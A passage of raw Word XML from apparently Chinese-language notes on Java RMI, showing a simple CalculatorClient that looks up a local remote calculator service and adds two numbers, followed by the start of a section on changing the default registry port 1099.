          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA35D1" w14:textId="77777777" w:rsidR="00944CD0" w:rsidRDefault="00944CD0" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666F9E10" w14:textId="0242F5BE" w:rsidR="00284AA2" w:rsidRPr="00DE1D6F" w:rsidRDefault="009B7345" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1C73D" w14:textId="77777777" w:rsidR="00944CD0" w:rsidRDefault="00944CD0" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.Naming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CalculatorClient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public static void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[] args) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找远程对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>calculator = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Calculator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Naming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"//localhost/CalculatorService"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用远程方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>result = calculator.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0BF69"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0BF69"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"Result: " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+ result);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">catch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"RMI Client exception: " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+ e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEACB77" w14:textId="77777777" w:rsidR="00284AA2" w:rsidRPr="00944CD0" w:rsidRDefault="00284AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55674EB3" w14:textId="314244C3" w:rsidR="00284AA2" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F227D01" w14:textId="77777777" w:rsidR="00263785" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，命名服务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Naming Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）通常使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005332CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认端口</w:t>
      </w:r>
      <w:r w:rsidRPr="005332CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此，当您在服务器端使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
